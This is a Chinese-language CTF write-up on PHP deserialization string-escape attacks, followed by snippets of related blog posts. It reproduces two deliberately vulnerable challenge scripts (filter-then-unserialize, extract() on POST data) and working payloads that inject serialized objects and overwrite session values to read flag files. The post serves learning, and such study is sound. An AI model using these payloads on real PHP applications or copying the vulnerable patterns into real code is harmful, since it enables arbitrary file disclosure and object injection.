刷了一下CTF反序列化的题,去年没有好好了解。又补了一次PHP,害太菜了。每天看看别人的博客真的可以鼓舞人。简单记录一下两道字符串逃逸问题

推荐一个反序列化总结的很好的笔记https://www.cnblogs.com/wjrblogs/p/12800358.html

//变长 直接构造多个关键词,这样就能逃出几个字符
<?php
error_reporting(255);
class A
{
public $filename = __FILE__;
public function __destruct()
{
highlight_file($this->filename);
}
}
function waf($s)
{
return preg_replace('/flag/i', 'index', $s);
}
if (isset($_REQUEST['x']) && is_string($_REQUEST['x'])) {
$a = [
0 => $_REQUEST['x'],
1 => '1'
];
@unserialize(waf(serialize($a)));
} else {
new A();
}

flag->index 长度增加1 逃逸的长度为49 所以需要49的flag

";i:0;O:1:"A":1:{s:8:"filename";s:8:"flag.php";}}

(waf(serialize($a)) ------ flag index 替换了所以[flag.php]要用16进制 然后 s:8 其中S必须大写才会存在16进制

";i:0;O:1:"A":1:{s:8:"filename";s:8:"\66\6c\61\67\2E\70\68\70";}} // i:0 键名无所谓已近到下一层了

//变短 通过键逃逸和值逃逸--------分析思路 先分析再做题 不然思路真的很乱
<?php
$function = @$_GET['f'];
function filter($img)
{
$filter_arr = array('php', 'flag', 'php5', 'php4', 'fl1g');
$filter = '/' . implode('|', $filter_arr) . '/i';
return preg_replace($filter, '', $img);
}
if (@$_SESSION) {
unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
if (!$function) {
echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if (@!$_GET['img_path']) {
$_SESSION['img'] = base64_encode('guest_img.png');
} else {
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));
if ($function == 'highlight_file') {
highlight_file('index.php');
} else if ($function == 'phpinfo') {
eval('phpinfo();'); //maybe you can find something in here!
} else if ($function == 'show_image') {
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}

$serialize_info = filter(serialize($_SESSION)); 序列化 SESSION数组并且过滤 然后看到$function == 'phpinfo'

我们去phpinfo查看很容易看到d0g3_f1ag.php和PHP处理器

但是这个题目里没有读取session文件,这个题只是把$SESSION数组进行了serialize().这种地方不要因为看到php处理器而犯迷糊。

所以我们大概明确了就是

$userinfo['img']=d0g3_f1ag.php 或者 base64_decode($userinfo['img'])=ZDBnM19mMWFnLnBocA==即可

其中$_SESSION['user']之后有一个extract($_POST); 根据extract()我们可以进行变量覆盖

extract() 函数从数组中将变量导入到当前的符号表,该函数使用数组键名作为变量名,使用数组键值作为变量值

<?php
$_SESSION["user"] = 'guest';
$_SESSION["funtion"] = 'xxx';
extract($_GET);
var_dump($_SESSION); 请求?_SESSION[test]=xxx
array (size=1)
'test' => string 'xxx' (length=3)

值逃逸:需要两个连续的键值对,由第一个的值覆盖第二个的键,这样第二个值就逃逸出去,单独作为一个键值对~~

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}  //后面加的是为了键和值保持一致 随便 加前面用_SESSION[xx]=xxx同理

这样我们需要把下一个的键和值当成第一个的值, x代表数字 下一个的值和键需要多少位 然后flag构造多少 因为flag->NULL了。

_SESSION[user]=flagflagflagflagflagflag   ==>  s:4:"user";s:x:""

其中最后一个"会给下一个键一起成为上一个的值

_SESSION[function]=a   ==>  s:7:function;s:x:""
s:4:"user";s:24:"[";s:8:"function";s:59:"a]" //括号是值
//键逃逸`,这儿只需要一个键值对就行了,我们直接构造会被过滤的键,这样值得一部分充当键,剩下得一部分作为单独得键值对~~
_SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
s:7:"flagphp [";s:67:] ";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"

过滤的键然后他的值的属性 成为键的值 先计算键的值然后再去构造键。然后查看源代码

<?php
$flag = 'flag in /d0g3_fllllllag';
?>
将/d0g3_fllllllag base64编码就好。

参考:https://blog.csdn.net/a3320315/article/details/104118688/

CTF反序列化逃逸的更多相关文章

  1. [0CTF 2016]piapiapia(反序列逃逸)

    我尝试了几种payload,发现有两种情况. 第一种:Invalid user name 第二种:Invalid user name or password 第一步想到的是盲注或者报错,因为fuzz一 ...

  2. BUUCTF[归纳]sql注入相关题目

    这是我自己对于sql注入的部分ctf题型的归纳,均来自buuctf的平台环境. [0CTF 2016]piapiapia 我尝试了几种payload,发现有两种情况. 第一种:Invalid user ...

  3. php代码审计整理

    目录 变量覆盖 1x01.extract 变量覆盖 定义和用法 语法 漏洞产生:使用了默认设置 攻击方法:制造变量名冲突,对于需要相等的值可以同时置空 修复:设定一个冲突时的处理规则 例题: 1x02 ...

  4. 2020新春公益赛 writeup

    简单的招聘系统 无需注册账号,admin'or 1#登陆,到blank page页面,在输入key处发现有注入点: /pages-blank.php?key=1%27+union+select+1%2 ...

  5. BUUCTF知识记录

    [强网杯 2019]随便注 先尝试普通的注入 发现注入成功了,接下来走流程的时候碰到了问题 发现过滤了select和where这个两个最重要的查询语句,不过其他的过滤很奇怪,为什么要过滤update, ...

  6. UNCTF2020 web writeup

    1.Easy_ssrf 给了file_get_contents,直接读取flag即可 2.Easyunserialize 利用点在 构造uname反序列化逃逸即可 3.Babyeval 两个过滤,绕过 ...

  7. 从一道ctf看php反序列化漏洞的应用场景

    目录 0x00 first 前几天joomla爆出个反序列化漏洞,原因是因为对序列化后的字符进行过滤,导致用户可控字符溢出,从而控制序列化内容,配合对象注入导致RCE.刚好今天刷CTF题时遇到了一个类 ...

  8. 详解PHP反序列化中的字符逃逸

    首发先知社区,https://xz.aliyun.com/t/6718/ PHP 反序列化字符逃逸 下述所有测试均在 php 7.1.13 nts 下完成 先说几个特性,PHP 在反序列化时,对类中不 ...

  9. GYCTF easyphp 【反序列化配合字符逃逸】

    基础知识可以参考我之前写的那个 0CTF 2016 piapiapia  那个题只是简单记录了一下,学习了一下php反序列化的思路 https://www.cnblogs.com/tiaopideju ...

随机推荐

  1. 去除HTML中的标签内容

    采集后的数据都带有'<>'html标签: <img src="http://i4.hdfimg.com/www/images/giftrans/3d/da/7b/18414 ...

  2. Apple Xcode 12.5 (12E262) 正式版发布 - 构建 Universal App

    请访问原文链接:https://sysin.org/article/apple-xcode-12/,查看最新版.转载请保留出处. Xcode 12 简介 Xcode 12 采用全新设计,在 macOS ...

  3. Tomcat 中文乱码

    问题描述 tomcat9启动后会有中文乱码,比如控制台乱码: startup.bat启动时乱码: 解决方法 打开"/apache-tomcat-9.0.20/conf/logging.pro ...

  4. ZooKeeper学习笔记二:API基本使用

    Grey ZooKeeper学习笔记二:API基本使用 准备工作 搭建一个zk集群,参考ZooKeeper学习笔记一:集群搭建. 确保项目可以访问集群的每个节点 新建一个基于jdk1.8的maven项 ...

  5. 昇腾AI 软硬件全栈平台

    昇腾AI 软硬件全栈平台

  6. TensorFlow指定CPU和GPU方法

    TensorFlow指定CPU和GPU方法 TensorFlow 支持 CPU 和 GPU.它也支持分布式计算.可以在一个或多个计算机系统的多个设备上使用 TensorFlow. TensorFlow ...

  7. 在python_request 中 nb-log 日志模块的使用,应用到项目实际使用

    一.安装 pip install nb-log pycham 中安装: 二.基本使用 2.1 pycham中调整设置控制台日志打印出的颜色 2.2 设置完成后去掉console弹出的颜色设置 2.3  ...

  8. th:insert、th:replace、th:include抽取和引用页面公共片段、传参等

    一.抽取公共片段 th:fragment  给片段命名 将公共片段抽取出来,并在顶级标签内使用th:fragment给该片段命名. 例如:将公共片段抽取出来放到comment/bar.html中: & ...

  9. LongAdder源码阅读笔记

    功能描述 LongAdder通过创建多个副本对象,解决了多线程使用CAS更新同一个对象造成的CPU阻塞,加快了对线程处理的速度.当多个线程同一时刻更新一个AtomicLong类型的变量时,只有一个线程 ...

  10. Qt中的内存回收机制

    Qt中的内存回收机制 在Qt中创建对象的时候会提供一个 Parent对象指针(可以查看类的构造函数),下面来解释这个parent到底是干什么的. QObject是以对象树的形式组织起来的.当你创建一个 ...